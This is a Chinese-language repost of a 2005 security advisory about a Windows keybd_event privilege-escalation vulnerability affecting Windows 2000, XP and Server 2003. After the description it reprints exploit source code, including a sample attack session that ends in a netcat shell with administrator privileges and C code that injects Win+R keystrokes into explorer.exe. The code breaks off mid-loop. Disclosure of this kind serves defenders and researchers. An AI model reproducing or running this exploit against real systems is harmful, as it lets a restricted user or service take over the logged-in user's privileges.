Microsoft Windows键盘事件权限提升漏洞
2008-04-09 04:19:25来源:互联网 阅读 ()
发布日期:2005-09-07
更新日期:2005-09-07
受影响系统:
Microsoft Windows XP SP2描述:
Microsoft Windows XP SP1
Microsoft Windows XP
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows 2000SP4
Microsoft Windows 2000SP3
Microsoft Windows 2000SP2
Microsoft Windows 2000SP1
Microsoft Windows 2000
Microsoft Windows
BUGTRAQ ID: 14743
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Windows中存在权限提升漏洞,攻击者可以通过向以更高权限运行的桌面应用程序(如explorer.exe)发送恶意的键盘事件,导致以目标用户的权限执行任意代码。
起因是桌面应用程序处理通过keybd_event() function函数发送的键盘事件时存在设计错误。在当前的Microsoft安全模式中,共享桌面的应用程序之间可以发送消息,每个桌面应用程序都可以处理同一桌面中执行的每个进程,而任何应用程序都可以通过发送键盘敲击动作模拟虚拟键盘,这就允许每个每个进程都如交互用户那样发送消息和击键动作。
<*来源:Andres Tarasco (aT4r@haxorcitos.com)
Frederic Charpentier (fcharpen@xmcopartners.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112604220032671&w=2
http://www.haxorcitos.com/MSRC-6005bgs-EN.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* Microsoft Windows keybd_event validation vulnerability.
* Local privilege elevation
*
* Credits: Andres Tarasco ( aT4r _@_ haxorcitos.com )
* I馻ki Lopez ( ilo _@_ reversing.org )
*
* Platforms afected/tested:
*
* - Windows 2000
* - Windows XP
* - Windows 2003
*
*
* Original Advisory: http://www.haxorcitos.com
* http://www.reversing.org
*
* Exploit Date: 08 / 06 / 2005
*
* Orignal Advisory:
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
* Attack Scenario:
*
* a) An attacker who gains access to an unprivileged shell/application executed
* with the application runas.
* b) An attacker who gains access to a service with flags INTERACT_WITH_DESKTOP
*
* Impact:
*
* Due to an invalid keyboard input validation, its possible to send keys to any
* application of the Desktop.
* By sending some short-cut keys its possible to execute code and elevate privileges
* getting loggued user privileges and bypass runas/service security restriction.
*
* Exploit usage:
*
* C:\>whoami
* AQUARIUS\Administrador
*
* C:\>runas /user:restricted cmd.exe
* Enter the password for restricted:
* Attempting to start cmd.exe as user "AQUARIUS\restricted" ...
*
*
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>cd \
*
* C:\>whoami
* AQUARIUS\restricted
*
* C:\>tlist.exe |find "explorer.exe"
* 1140 explorer.exe Program Manager
*
* C:\>c:\keybd.exe 1140
* HANDLE Found. Attacking =)
*
* C:\>nc localhost 65535
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\>whoami
* whoami
* AQUARIUS\Administrador
*
*
* DONE =)
*
*/
#include <stdio.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define HAXORCITOS 65535
unsigned int pid = 0;
char buf[256]="";
/**************************************************************/
void ExplorerExecution (HWND hwnd, LPARAM lParam){
DWORD hwndid;
int i;
GetWindowThreadProcessId(hwnd,&hwndid);
if (hwndid == pid){
/*
Replace keybd_event with SendMessage() and PostMessage() calls
*/
printf("HANDLE Found. Attacking =)\n");
SetForegroundWindow(hwnd);
keybd_event(VK_LWIN,1,0,0);
keybd_event(VkKeyScan('r'),1,0,0);
keybd_event(VK_LWIN,1,KEYEVENTF_KEYUP,0);
keybd_event(VkKeyScan('r'),1,KEYEVENTF_KEYUP,0);
for(i=0;i<strlen(buf);i ) {
if (buf[i]==':') {
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
